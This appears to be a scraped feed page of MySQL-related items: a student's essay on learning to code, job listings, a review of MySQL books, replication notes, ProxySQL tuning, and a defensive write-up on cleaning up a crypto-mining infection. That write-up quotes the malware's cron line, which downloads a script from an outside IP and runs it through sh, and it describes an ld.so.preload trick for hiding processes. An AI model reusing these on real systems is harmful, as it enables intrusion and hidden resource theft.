Let's fast-forward to 4 months after I started university. It was the end of my first semester (2015, 3 years ago), I had just 4 months of coding experience, my first programming class was object-oriented programming, and the deadline of my first final project in my CS degree was 1 week away.

An ERP system to manage the students, professors, classes and schedules of a university, using a MySQL database.

I wanted to cry. Like, literally. It was my first project in my CS career and I was stuck. What is a database? What is SQL? What is a non-relational database? What is a database management system? How can I connect my Java code to a database? I had a lot of questions like those; I had no experience and no idea how to do those things.

Of course I could have just copied code from Stack Overflow or pages like that, but I NEEDED to know how things work. For me, copying is just not enough. I was trying to finish the project, doing everything from scratch and on my own.

I remember those nights of searching online through a lot of videos, web pages, books, everything... only to bring new questions to my head. I was totally lost. Searching the web was just doing me harm; Computer Science is an ocean of information and I was in the middle of that ocean with no clue where I was, what to do or what information to search for.

Our team finished the project with the help of students from higher semesters.

I still remember the feeling. The sensation that you know nothing; that even if you put all your effort into searching for information, you don't understand anything; everything seems to be written in a foreign language. (Actually it was: everything was in English. But you get the point.)

Even 6 months later, after a C programming class, searching how to do web programming was like... wait, what the hell is a framework, and why do people recommend tons of them? What is Django? Backend? Frontend? What is the difference between a framework and a library? Maybe I was too slow, but that was a lot of information for me.

Do I still feel the same?

No. Absolutely not. I think that at some point in my degree I learned how to learn. This is a very important skill, because as a Software Engineer you need to stay updated with new technologies, and you need the ability to learn new tech and tools as you walk through your career.

Maybe, eventually, everyone gets to this point. The point where you can read any documentation online and pick up a new language. The point where you can read about new tech without being completely lost. The point where you can learn whatever you want online, just with a little patience.

But maybe not. Maybe some people get so frustrated that they decide to quit CS; maybe some convince themselves: "This is not for me". If you are getting to that point of frustration, let me tell you something: you are not alone. Everyone in the developer community is here to help you.

Do Not Give Up.

The next tips are for you. I want to share some of my little experience as a CS student on how to start diving into this beautiful ocean of knowledge. Keep in mind that these tips were the little things that helped me become a better learner; they may not be useful for your situation, because we are all different.

Ask for help

Maybe it sounds obvious, but it is not. Sometimes our pride doesn't let us ask for help, even though it is a normal and healthy thing to do.

Don't expect someone to give you all the answers. Ask for advice, ask about experiences, try to understand how they learned what they know, try to figure out what you need to start studying to get to the level where they are. Ask for advice to learn how to start tackling all the information that is out there.

Be Social

Going to Campus Party México (a tech convention full of conferences) has been one of the best experiences of my life. I spent 8 hours traveling on a bus with a bunch of strangers across the country just to meet new people and to learn all that I could about technology.

Talking to all the devs, the hackers, the creative people and even the business people helped me grow in an incredible way.

Having conversations with people who have more experience than you is like reading a good book. It's amazing. You get to hear experiences that will help you through your journey; knowing what is coming and how they confronted those situations is a great opportunity to think about how you would react in similar situations. You start to discover a lot of things you were unaware of.

Math is fun

Not everybody thinks this way, but I do.

Having a good background in math is very helpful for every programmer. In your daily work you probably will not use derivatives and integrals, BUT algebra, calculus, probability and geometry will give you an excellent sense of logic.

I am not saying that you have to be good at math to be a good dev. My point is that, in my case, I can see a relation between being better at math and having a deeper understanding of how a computer works, as well as more ease writing code.

Read Read and Read

Reading is fundamental to your development. Articles like the ones you can find here or on any development site are very helpful.

Be a proactive student; don't be satisfied with the information you get in school, in the bootcamp or in the online course.

You need to be hungry for information. Time is not an excuse: I read "Clean Code" by Robert C. Martin between my uni classes, even though I work half-time as a web dev.

If I can do it, you surely can.

Make CS an important part of your life

A few months into my degree I realized that making CS a constant topic in my life (and I am not counting my "academic life" here) was a great way to learn about small topics in a fun and fast way.

When I say "make CS an important part of my life" I am referring to little things like following YouTube channels about CS, following devs on Twitter, going to tech conferences, making CS a topic of conversation with other devs/classmates instead of talking about last night's episode of -insert favorite show-, and even talking with my uni professors about their experience in the tech industry.

I am not saying that you should drop all your hobbies to live a 100% software engineering life. I am saying that you should consider CS another hobby in your life.

It's okay if this is too much CS for you; some people prefer to think about these things only during their work hours. But if you are like me and you absolutely LOVE coding and learning new things about tech every day, you should consider this advice.

Do not stress out

This point is very important. Always keep calm.

NO ONE knows everything, so keep calm. It is okay if you don't understand some topic, it is okay if you don't understand some tech, and it is okay if you just don't feel like learning it.

I used to stress out a lot because my skills in web development (especially front-end) are not the best out there, but after some time thinking about what I really want in my life, I realized that web development is just not my thing.

So, after all, there was no point in getting stressed because I didn't know the latest JavaScript framework or because I didn't know how to do good front-end design, if at the end of the day I was going to pursue the low-level programming and algorithms path.

Those were some aspects of my life as a student that helped me learn more and faster. Maybe those points do not apply to you, but I feel the need to bring new ideas to the discussion, because after all, communities like this one helped me in my introduction to this industry.

Sometimes you can feel down, sometimes you can feel that your productivity levels are really low and that you are not learning anything, but let me tell you this: eventually everything gets better. Just keep going, keep learning, keep putting effort into what you want.

"Everything in this life has a fix, except death." So enjoy your life learning what you love.

Thank you for reading ~


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          python,mysql,qt programmer needed      Cache   Translate Page      
Hello, I have an ongoing project in python using pyqt4. I need it done asap. The project is 75% complete. Database is designed, UI is there . If you have 100 hour+ experience in programming in python,It is an easy job... (Budget: $250 - $750 USD, Jobs: Python)
          WordPress Site Hacked - Opens Up Third Party Sites After Few Seconds      Cache   Translate Page      
My web design client's WordPress site hacked opens up third party websites in new windows after a few seconds. Fix right now. Work on live server. Unlimited changes until we accept the work. $15 max. (Budget: $10 - $30 USD, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          Help me create a SQL statement to find spam in my forum database      Cache   Translate Page      
Hi! I have a phpBB forum that has accumulated a number of spam posts over the years. I need to create a simple SQL statement that will find the posts that contain the strings: -http -https -www. .com... (Budget: $10 - $30 AUD, Jobs: Forum Software, MySQL, SQL)
          Mining Malware Infection Analysis (Is This Post Enough?)      Cache   Translate Page      

If you often walk along the river, how can you avoid getting your shoes wet?

Sure enough, yesterday in a friends' tech group I ran into yet another crypto-mining infection...

It suddenly reminded me of the time I helped my wife's company deal with a weak-credential vulnerability in the Hadoop YARN management platform that had been exploited,

turning their servers into a miner's captives.

Symptoms from that earlier case:

Visiting the YARN page on port 8088 showed jobs running non-stop, as in the screenshot:

[screenshot: YARN applications page]

The user was dr.who. After asking the internal users, none of them had any jobs running.

Conclusion:

The server had been infected. The attacker exploited the unauthorized-access vulnerability in the Hadoop YARN resource manager's REST API, a security hole that allows remote code execution without authentication.

top showed CPU usage above 360%, and the system was very sluggish.

Fix:

1. Find the processes with high CPU usage and kill them.

2. Check the /tmp and /var/tmp directories and delete suspicious files such as java, ppc, w.conf.

3. crontab -l revealed a job: * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1 — delete it.

4. Go through the YARN logs, identify the rogue applications, and remove them.

Then check with top again for high-CPU processes; kill any that remain, and if there are none things should be back to normal.

Note: YARN exposes a REST API, open by default on ports 8088 and 8090 (the former by default), that lets users create applications and submit jobs directly through the API. If misconfigured so that the REST API is reachable from the public Internet, it allows unauthorized access: anyone can use it for remote command execution, and therefore for mining. The attacker simply submits a command through the REST API on port 8088 to download and run a .sh script inside the server, which in turn downloads and launches the mining program. So enable Kerberos authentication, forbid anonymous access, and change the 8088 port.

So I volunteered, assuming it would be a similar situation.

The conversation in the tech group (screenshots omitted):

The obfuscated script:

[screenshot: obfuscated script]

Excerpts from the decoded script:

[screenshots: decoded script]

At that point I couldn't resist,

and asked to remote in and take a crack at it myself.

I tried deleting things several times,

undoing what the script did, step by step,

but it still couldn't be killed off cleanly. top showed the CPU pegged at 100%,

yet I couldn't tell which program was using it.

Because of network lag, I didn't take screenshots.

So I figured top must have been replaced.

I read through the script again:

it turned out a payload was carried in an image and embedded into a forged library file with the same name as a legitimate one;

that library file in turn invoked the script that downloads the program,

so a single run of top relaunched the program automatically, spawning descendants without end.

[screenshots: the relevant part of the script]
(The script screenshots were taken after decoding it on my own server.)

I wanted to kill off that library file hooked into top,

but given its deceptively legitimate name,

plus the processes that couldn't be cleaned up,

when I ran rm -rf

I could clearly sense my friend's nervousness.

After asking about the business impact,

it turned out the affected services weren't critical.

It was also almost the end of the workday, so I didn't want to keep wrestling with it.

I went through the script carefully once more,

meaning to share some lessons with my friend before the system was reinstalled,

but I sensed he wasn't really keen

on studying the problem thoroughly,

so I suggested a reinstall.

Afterwards, I summed things up on the subway ride home.

Common ways to handle a crypto-mining infection

The reasoning behind the cleanup process, and suggested methods.

1. How does a server catch mining malware in the first place?

Compromised hosts, weak passwords, webshells, XSS, software bugs — Redis, ZooKeeper, MySQL, 0-days, YARN and the like — get the server scanned and privileges escalated.

2. When we kill the mining process, it restarts on its own.

The cleanup wasn't thorough: cron jobs, tampered commands, autostart files, history records.

3. How to handle it?

First judge by business impact. If the infection is breaking the service, use your HA setup to switch the application away, take the server out of rotation, cut off all network access, and then do the cleanup.

The usual approach goes like this: first block the attacker's addresses with iptables or firewalld — effectively cutting off the network source — and then analyze and deal with the cause of the mining.

For the cleanup itself, analyze the mining script and work through it item by item: restore the commands it tampered with and delete the files it created.

Afterwards, run security tests against the system and the web applications and patch the vulnerabilities.

Run periodic checks with Linux backdoor/rootkit detection tools such as chkrootkit and RKHunter.

Compare MD5 checksums of system files. In the end, the biggest factor in security is people.

And of course monitoring is extremely important.

4. Root cause of this incident

This incident was caused by a weak Redis password. Through the CONFIG command, Redis can be told to change its working directory and write the attacker's key onto the server, achieving privilege escalation.

The Redis unauthorized-access flaw can easily get a system compromised:

https://www.seebug.org/vuldb/ssvid-89715

Commands I recommend after a similar incident:

See which process is hogging the CPU,

with top, or with ps aux.

In this case top couldn't show which process was using the CPU. After reading the script I ran cat /etc/ld.so.preload and found it loading an unusual file, evidently used to hide processes. Comment out or delete its contents, run ldconfig, and then check the processes with top again.

Open question:

The image referenced in the script opens in a browser but not locally. I suspect steganography. (I couldn't upload it through the WeChat backend.)

It wouldn't open locally, and steganography tools couldn't open it either.

Use ls -lt /etc | head to see recently changed files and directories,

or use the find command with stat to locate recently modified files.

Of course, a more careful attacker will also tamper with the files' change timestamps.

To find a process's files for deletion, any one of these commands will do:

ps -ef | grep shutdown [command]; ps aux | grep /bin/bash [command path]; ps aux | grep bash [command]

lsof -p PID

cd /proc/4170 [pid]

Find all the zombie processes on the system:

ps aux | grep 'defunct'

ps -ef | grep defunct | grep -v grep | wc -l

Clean up zombie processes:

ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9

kill -HUP $(ps -A -ostat,ppid | grep -e '^[Zz]' | awk '{print $2}')

Find the scheduled tasks on the system:

crontab -l

or

cd /var/spool/cron  # inspect the files in this directory and delete the malicious ones

vim /etc/crontab

There will be a cron entry in there that usually can't simply be deleted. Opening its URL in a browser returns a script, base64-encoded; decode it and you can read the contents.

Also watch out for scripts set to start with the machine.

Following the script, delete the files it created; in my case the targets were

/usr/local/lib/dns.so and /etc/ld.so.preload

Check the system login logs

The log file /var/log/wtmp gets a record appended for every login to the system; to hinder tampering, it is a binary file.

cd /var/log ; last    or    last -f /var/log/wtmp

In this case, of course, the logs had all been wiped.

Clear your own command history, so an intruder who gets back in can't see what you did.

The history command shows past commands.

history -c clears only the current shell's history. The system generally saves the records to a file, and as long as that file is unchanged the records survive. On Linux the history file is .bash_history; empty it (echo '' > /root/.bash_history) and the saved commands are gone.

Calling history -c from inside a shell script won't work: by default bash spawns a child process to run the script, and running history -c in the child does not clear your current shell's history.

You can run the script with source instead (source ./script); source executes the commands in the current bash environment.

Close unneeded ports

Block the domains and IPs found in the script, cutting off access to the mining servers:

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP

If Redis is installed, change its port and set a more complex password.

Comments and pointers from the experts who read this are most welcome.

That's all — until next time!


          Adriod Developer - vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDK’s, API, HTML,CSS, MYSQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          database ..      Cache   Translate Page      
Knowledge of databse is required (Budget: $10 - $30 USD, Jobs: Database Administration, Database Development, Database Programming, MySQL, SQL)
          Looking for CodeIgniter developer to make a custom      Cache   Translate Page      
1. On admin side for user role add the option to enable/disable (Edit, Delete) 2. On admin side add the option to enable/disable the user settings 3. Fix languages problems some words are not being translate (Budget: $10 - $30 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Software Architecture)
          Need Codeigniter Developers to develop Websites      Cache   Translate Page      
Need Codeigniter Developers to develop Websites (Budget: $2 - $8 USD, Jobs: Codeigniter, HTML, MySQL, PHP, Website Design)
          Migrate ALL my website from VLDPersonals to Chameleon social      Cache   Translate Page      
I want to migrate all profiles, pictures, blogs texts and functionnalities of my website to the Chameleon social script : https://www.chameleonsoftwareonline.com/fr/index.php (Budget: €12 - €18 EUR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Learning Management system      Cache   Translate Page      
looking for who can build customize learning management system in PHP or any high secure language like Edx and others (Budget: ₹37500 - ₹75000 INR, Jobs: HTML, MySQL, PHP, Software Architecture, Website Design)
          MySQL Transactions & Concurrency in Practice      Cache   Translate Page      
1. Can SQL like "UPDATE tbl SET count = count - 10 WHERE id = 1" guarantee safety under concurrent transactions? Answer: yes. The UPDATE takes a lock on the row matched by id, and "x = x - y" is computed on top of the most recently committed result. Demo: t1 […] t2 […] You'll then find that t2 blocks, i.e. it is locked. If you have the privilege to inspect locks, you should be able to see the lock. Then commit t1, then commit t2, and the final result is correct. 2.
          need script for server to get scores from sites and post to server      Cache   Translate Page      
i need help with a script that will run over and over going to a few websites getting scores of various teams and sports. and then printing the data on a page on my server in a format we set (Budget: $30 - $250 USD, Jobs: HTML, Javascript, Linux, MySQL, PHP)
          Website Designer Graphic Design WP and Joomla      Cache   Translate Page      
For ongoing work. Must be prepared to work New Zealand/Australian work hours. Most projects are WP or WooCommerce, with some Joomla projects. Must have a proven track record of excellence and successful job completion... (Budget: $15 - $25 USD, Jobs: MySQL)
          i need to create html php shopping cart website      Cache   Translate Page      
Hi. I am looking for an HTML/PHP shopping cart script with a backend. I need these functions: cart, coupon code, item-wise discount, full invoice discount... like (Budget: $250 - $750 USD, Jobs: HTML, Javascript, MySQL, PHP, Website Design)
          Web Marketing Specialist II      Cache   Translate Page      
AZ-Phoenix, Web Marketing Specialist II for Axway, Inc. (Phoenix, AZ) Responsible for app engg mngmnt & maintenance of marketing automation platforms. Reqs Bach in Info Tech, Comp Info Sys, Bus or rltd. Reqs 3 yrs of post-Bach exp which must include some exp w/: Web front-end develmnt using HTML, CSS, Javascript, JQuery; Web back-end develmnt using PHP, MySQL, Git; Responsive Web Design; troubleshooting or mo
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          MySQL Books - 2018 has been a very good year      Cache   Translate Page      
Someone once told me you can tell how healthy a software project is by the number of new books each year. For the past few years the MySQL community has been blessed with one or two books each year. Part of that was the major shift with the MySQL 8 changes, but part of it was that the vast majority of the changes were fairly minor and did not need detailed explanations. But this year we have been blessed with four new books. Four very good books on new facets of MySQL.

Introducing the MySQL 8 Document Store is the latest book from Dr. Charles Bell on MySQL. If you have read any of Dr. Chuck's other books, you know they are well written with lots of examples. This is more than a simple introduction, with many intermediate and advanced concepts covered in detail.

MySQL & JSON - A Practical Programming Guide by yours truly is a guide for developers who want to get the most out of the JSON data type introduced in MySQL 5.7 and improved in MySQL 8. While I love MySQL's documentation, I wanted to provide detailed examples of how to use the various functions and features of the JSON data type.

Jesper Wisborg Krogh is a busy man at work and somehow found the time to author and co-author two books. The newest is MySQL Connector/Python Revealed: SQL and NoSQL Data Storage Using MySQL for Python Programmers, which I have only just received. If you are a Python programmer (or want to be) then you need to order your copy today. A few chapters in and I am already finding it a great, informative read.

Jesper and Mikiya Okuno produced a definitive guide to the MySQL NDB cluster with Pro MySQL NDB Cluster. NDB cluster is often confusing and just different enough from 'regular' MySQL to make you want a clear, concise guidebook by your side. And this is that book.

Recommendation: Each of these books has its own primary MySQL niche (Document Store, JSON, Python & Document Store, and NDB Cluster) but also has deeper breadth, in that they cover material you either will not find in the documentation or would have to distill for yourself. They not only provide valuable tools to learn their primary facets of the technology but also do double service as reference guides.
          MySQL Replication Notes      Cache   Translate Page      
MySQL Replication was my first project as a Database Administrator (DBA); I have been working with replication technologies for the last few years and am glad to contribute my small part to the development of this technology. MySQL supports different replication topologies, and a good understanding of the basic concepts will help you build and manage various complex topologies. I am writing here some of the key points to take care of when you are building MySQL replication. Consider this post a starting point for building high-performance, consistent MySQL servers.

Let me start with the key points below:

Hardware
MySQL Server Version
MySQL Server Configuration
Primary Key
Storage Engine

I will update this post with relevant points whenever I get time. I am trying to provide generic concepts applicable to all versions of MySQL; however, some of the concepts are new and apply only to recent versions (> 5.0).

Hardware: The slave must be resourced on par with (or better than) any master it is expected to keep up with. Slave resources include the following:

Disk IO
Computation (vCPU)
InnoDB Buffer Pool (RAM)

MySQL 5.7 supports multi-threaded replication, but it is limited to one thread per database. Under heavy writes (multiple threads) on the master's databases, there is a chance the slave will lag behind the master, since only one thread applies the binlog on the slave per database and its writes are all serialized.

MySQL Version: It is highly recommended that master and slave servers run the same version. A different version of MySQL on the slave can affect SQL execution timings; for example, MySQL 8.0 is considerably faster than 5.5. It is also worth considering feature additions, removals, and modifications.
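The per-database applier limitation above can be illustrated with a back-of-the-envelope Python sketch (hypothetical timings, not measurements): the master runs the writes concurrently, but the slave's single per-database applier must run them one after another.

```python
# Hypothetical sketch of the lag mechanism described above: with MySQL 5.7's
# per-database parallel replication, all binlog events for ONE schema are
# applied by a single thread on the slave, even if the master ran them on
# many client threads concurrently.
events = [2, 2, 2, 2]  # seconds of work, all against the same schema

# Master: four client threads run concurrently -> wall time ~ max(events)
master_wall_time = max(events)

# Slave: one applier thread per database -> wall time ~ sum(events)
slave_wall_time = sum(events)

print(master_wall_time, slave_wall_time)  # 2 8 -> the slave falls behind
```

With every extra concurrent writer on the master, the gap between max() and sum() grows, which is exactly the lag pattern described.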
MySQL Server Configuration: The MySQL server configuration should be identical. We may have identical hardware resources and the same MySQL version, but if MySQL is not configured to utilize the available resources in the same way, execution plans will differ. For example, the InnoDB buffer pool size must be configured to utilize the memory; even with identical hardware, the buffer pool must be set at the MySQL instance level.

Primary Key: The primary key plays an important role in row-based replication (when binlog_format is either ROW or MIXED). Most often, a slave lagging behind the master while applying an RBR event is due to the lack of a primary key on the table involved. When no primary key is defined, for each affected row on the master, the entire row image has to be compared on a row-by-row basis against the matching table's data on the slave. This can be explained by how a transaction is performed on master and slave based on the availability of a primary key:

           With Primary Key                                  Without Primary Key
On Master  Uniquely identifies the row                       Uses any available key or performs a full table scan
On Slave   Uniquely identifies each row; changes can be      The entire row image is compared on a row-by-row basis
           quickly applied to the appropriate row images     against the matching table's data on the slave

A row-by-row scan can be very expensive and time consuming and can cause the slave to lag behind the master. When there is no primary key defined on a table, InnoDB internally generates a hidden clustered index named GEN_CLUST_INDEX containing row ID values. MySQL replication cannot use this hidden primary key, because these hidden row IDs are unique to each MySQL instance and are not consistent between a master and a slave. The best solution is to ensure all tables have a primary key. When no unique NOT NULL key is available on a table, at least create an auto-incrementing integer column (surrogate key) as the primary key.
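The cost difference between the two cases can be sketched with a toy Python model (hypothetical table and row counts, not MySQL internals): with a primary key the slave jumps straight to the row, without one it compares the full before-image row by row.

```python
# Sketch (hypothetical data) of why row-based events are cheap with a primary
# key and expensive without one.
table = [{"id": i, "val": i * 10} for i in range(100_000)]
pk_index = {row["id"]: row for row in table}  # what the PK lookup gives us

def apply_with_pk(row_id, new_val):
    pk_index[row_id]["val"] = new_val     # one lookup, O(1)
    return 1                              # rows examined

def apply_without_pk(before_image, new_val):
    examined = 0
    for row in table:                     # full scan, O(n) per changed row
        examined += 1
        if row == before_image:
            row["val"] = new_val
            break
    return examined

fast = apply_with_pk(99_999, 1)
slow = apply_without_pk({"id": 99_998, "val": 999_980}, 2)
print(fast, slow)  # 1 99999
```

One row examined versus nearly the whole table examined, for every changed row in every RBR event, is the lag multiplier described above.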
If it is not immediately possible to create a primary key on all such tables, there is a workaround to cope for a short period of time: changing the slave's row search algorithm. That is outside the scope of this post; I will cover it in a future post.

Mixing of Storage Engines: MySQL replication supports different storage engines on master and slave servers, but there are a few important things to take care of when mixing storage engines. Note that InnoDB is a transactional storage engine and MyISAM is non-transactional.

On Rollback: If binlog_format is STATEMENT and a transaction updates InnoDB and MyISAM tables and then performs ROLLBACK, only the InnoDB tables' data is rolled back. When this statement is written to the binlog it is sent to the slave; a slave where both tables are MyISAM will not perform the ROLLBACK, since MyISAM does not support transactions. That leaves the table inconsistent with the master.

Auto-increment column: Note that auto-increment is implemented differently in MyISAM and InnoDB: MyISAM locks the entire table to generate an auto-increment value, and when the auto-increment column is part of a composite key, insert operations on the MyISAM table are marked as unsafe. Refer to this page for a better understanding: https://dev.mysql.com/doc/refman/8.0/en/replication-features-auto-increment.html

Referential Integrity Constraints: InnoDB supports foreign keys and MyISAM does not. Cascading update and delete operations on InnoDB tables on the master replicate to the slave only if the tables are InnoDB on both master and slave. This is true for both STATEMENT- and ROW-based replication.
Refer to this page for an explanation: https://dev.mysql.com/doc/refman/5.7/en/innodb-and-mysql-replication.html

Locking: InnoDB performs row-level locking and MyISAM performs table-level locking, and all transactions on the slave are executed in a serialized manner; this negatively impacts slave performance and ends up with the slave lagging behind the master.

Logging: MyISAM is a non-transactional storage engine, and its statements are written to the binary log by the client thread immediately after execution, but before the locks are released. If the query is part of a transaction that also involves an InnoDB table, and the InnoDB statement is executed before the MyISAM query, the MyISAM statement is not written to the binlog immediately after execution; it waits for either commit or rollback. This is done to ensure the order of execution on the slave is the same as on the master. Transactions on InnoDB tables are written to the binary log only when the transaction is committed.

It is highly advisable to use a transactional storage engine with MySQL replication. Mixing storage engines may lead to inconsistency and performance issues between master and slave servers. Though MySQL does not produce any warnings, it should be noted and taken care of on our end. Also, MySQL 8.0 (since 5.6) shipping with InnoDB as the default storage engine and deprecating the older ISAM features indicates the future of the MySQL database: it is going to be completely transactional, and InnoDB is the recommended storage engine. There is discussion online about the removal of other storage engines and Oracle focusing development on the InnoDB engine; though that is not in the scope of this article, as a Database Administrator I prefer having different storage engines for different use cases, and that has been a unique feature of MySQL.

I hope this post is useful; please share your thoughts / feedback in the comments section.
          Reduce MySQL Memory Utilization With ProxySQL Multiplexing      Cache   Translate Page      
MySQL Adventures: Reduce MySQL Memory Utilization With ProxySQL Multiplexing

In our previous post, we explained how max_prepared_stmt_count can bring production down. This blog is a continuation of that post; you can read it at the link below.

How max_prepared_stmt_count bring down the production MySQL system

We had set max_prepared_stmt_count to 20000, but after that we kept hitting the error below:

Can't create more than max_prepared_stmt_count statements (current value: 20000)

We tried increasing it to 25000, 30000 and finally 50000. Unfortunately that did not fix it, and increasing this value leads to the memory leak we explained in our previous blog.

We are using ProxySQL to access the database servers, and the architecture looks like below.

Multiplexing in ProxySQL: The main purpose of multiplexing is to reduce the number of connections to the MySQL servers, so we can serve thousands of frontend connections with only a hundred backend connections. We enabled multiplexing while setting up the database environment, but multiplexing does not work all the time. ProxySQL tracks the transactions executing on each connection: if a transaction has not been committed or rolled back, that connection is never used for the next request; ProxySQL picks another free connection from the connection pool. From the ProxySQL docs, there are a few scenarios where multiplexing is disabled:

active transaction
tables are locked
SET queries (like SET FOREIGN_KEY_CHECKS)

In our case, most of the errors were due to the prepared statement count. Believe it, this issue also led us to reduce memory utilization.

Get the currently active prepared statements: Run the query below, which tells us the number of active prepared statements on the backend.
SELECT * FROM stats_mysql_global WHERE variable_name LIKE '%stmt%';

+---------------------------+----------------+
| Variable_Name             | Variable_Value |
+---------------------------+----------------+
| Com_backend_stmt_prepare  | 168318911      |
| Com_backend_stmt_execute  | 143165882      |
| Com_backend_stmt_close    | 0              |
| Com_frontend_stmt_prepare | 171609010      |
| Com_frontend_stmt_execute | 171234713      |
| Com_frontend_stmt_close   | 171234006      |
| Stmt_Client_Active_Total  | 19983          |
| Stmt_Client_Active_Unique | 4              |
| Stmt_Server_Active_Total  | 84             |
| Stmt_Server_Active_Unique | 23             |
| Stmt_Max_Stmt_id          | 10002          |
| Stmt_Cached               | 2186           |
+---------------------------+----------------+

# You can get the same result in MySQL as well
mysql> show status like 'Prepared_stmt_count';
+---------------------+-------+
| Variable_name       | Value |
+---------------------+-------+
| Prepared_stmt_count | 19983 |
+---------------------+-------+

You can see the number of active prepared statements is 19983. Running the query again and again, I saw a varying count, but it was always more than 19000. And you can see that Com_backend_stmt_close is 0: yes, ProxySQL never closes the prepared statements on the backend. But there is a mechanism in ProxySQL that allocates 20 prepared statements (20 is the default value) to each connection. Once a connection has executed all 20 statements, it comes back to the connection pool and all 20 statements are closed in one shot. Run the query below to get the default statement count per connection.

proxysql> show variables like "%stmt%";

+--------------------------------+-------+
| Variable_name                  | Value |
+--------------------------------+-------+
| mysql-max_stmts_per_connection | 20    |
| mysql-max_stmts_cache          | 10000 |
+--------------------------------+-------+

There is a great explanation of this variable by René Cannaò, the founder of ProxySQL. You can read about it here.

Why are this many prepared statements running?
As mentioned earlier, ProxySQL never closes the prepared statements on the backend. We realized that we were getting heavy traffic on both ProxySQL servers, all sent to one master node, and that Laravel issues all its queries as prepared statements. That is why we had this many prepared statements.

Get where most of the prepared statements are used: Run the query below in ProxySQL; it gives you the total count of executed prepared statements per database and username.

SELECT username, schemaname, count(*)
FROM stats_mysql_prepared_statements_info
GROUP BY 1, 2
ORDER BY 3 DESC;

+----------+------------+----------+
| username | schemaname | count(*) |
+----------+------------+----------+
| DBname   | user1      | 2850     |
| DBname   | user2      | 257      |
| DBname   | user3      | 108      |
| DBname   | user1      | 33       |
| DBname   | user2      | 33       |
| DBname   | user1      | 16       |
| DBname   | user1      | 15      |
+----------+------------+----------+

# There is a bug in this view: the username column actually shows the schema name and the schemaname column shows usernames. I have reported this bug in ProxySQL's GitHub repo: https://github.com/sysown/proxysql/issues/1720

Force ProxySQL to use multiplexing: There are a few cases where ProxySQL disables multiplexing. In particular, all queries that have @ in their query digest disable multiplexing.

Collect the queries which have @:

SELECT DISTINCT digest, digest_text
FROM stats_mysql_query_digest
WHERE digest_text LIKE '%@%' \G

*************************** 1. row ***************************
     digest: 0xA8F2FFB14312850C
digest_text: SELECT @@max_allowed_packet
*************************** 2. row ***************************
     digest: 0x7CDEEF2FF695B7F8
digest_text: SELECT @@session.tx_isolation
*************************** 3. row ***************************
     digest: 0x2B838C3B5DE79958
digest_text: SELECT @@session.auto_increment_increment AS auto_increment_increment, @@character_set_client AS character_set_client, @@character_set_connection AS character_set_connection, @@character_set_results AS character_set_results, @@character_set_server AS character_set_server, @@init_connect AS init_connect, @@interactive_timeout AS interactive_timeout, @@license AS license, @@lower_case_table_names AS lower_case_table_names, @@max_allowed_packet AS max_allowed_packet, @@net_buffer_length AS net_buffer_length, @@net_write_timeout AS net_write_timeout, @@query_cache_size AS query_cache_size, @@query_cache_type AS query_cache_type, @@sql_mode AS sql_mode, @@system_time_zone AS system_time_zone, @@time_zone AS time_zone, @@tx_isolation AS tx_isolation, @@wait_timeout AS wait_timeout

Finally, the statements above are executed as prepared statements, and by default these queries disable multiplexing. But ProxySQL has another cool feature: we can allow these queries (which contain @) to keep using multiplexing. Run the queries below to make ProxySQL use multiplexing for them. We can insert the rule by query pattern or by query digest.

# Add multiplexing to a query using the query text
INSERT INTO mysql_query_rules (active, match_digest, multiplex)
VALUES ('1', '^SELECT @@session.tx_isolation', 2);
INSERT INTO mysql_query_rules (active, match_digest, multiplex)
VALUES ('1', '^SELECT @@max_allowed_packet', 2);

# Add multiplexing to a query using the query digest
INSERT INTO mysql_query_rules (active, digest, multiplex)
VALUES ('1', '0x2B838C3B5DE79958', 2);

# Save to runtime and disk
LOAD MYSQL QUERY RULES TO RUNTIME;
SAVE MYSQL QUERY RULES TO DISK;

Restart ProxySQL: After enabling multiplexing in ProxySQL, it is mandatory to restart the ProxySQL service, or to close all existing connections and open new ones.

service proxysql restart

Let's check the active prepared statements in both ProxySQL and MySQL.
# ProxySQL
SELECT * FROM stats_mysql_global WHERE variable_name LIKE '%stmt%';

+--------------------------+----------------+
| Variable_Name            | Variable_Value |
+--------------------------+----------------+
| Stmt_Client_Active_Total | 6              |
+--------------------------+----------------+

# MySQL
mysql> show status like 'Prepared_stmt_count';
+---------------------+-------+
| Variable_name       | Value |
+---------------------+-------+
| Prepared_stmt_count | 166   |
+---------------------+-------+

The number in Prepared_stmt_count dropped dramatically, from 20000 to around 200. But why is there a different count between ProxySQL and MySQL? Again, refer to ProxySQL's docs: only once a connection has executed 20 statements does it close those prepared statements. ProxySQL shows active statements, while MySQL shows active plus executed-but-not-yet-closed statements.

Number of backend connections: After this change there was a sudden drop in the number of backend connections in ProxySQL. This proves that the statements which disable multiplexing create more backend connections.

MySQL's memory: Now we can see the explanation for this blog's title. See the graph below, which shows the large memory drop. The two main places where MySQL used more memory:

MySQL connections
Prepared statements

We all know that each MySQL connection requires some amount of memory, and I explained the memory consumption of prepared statements in my previous blog.

Conclusion: ProxySQL has a lot of great features. Multiplexing is good, but only after this incident did we realize that multiplexing helps reduce both the number of backend connections and MySQL's memory utilization. I hope that if you are a DBA you will read this and implement it in your environment as well. If it helped you, feel free to give your claps.
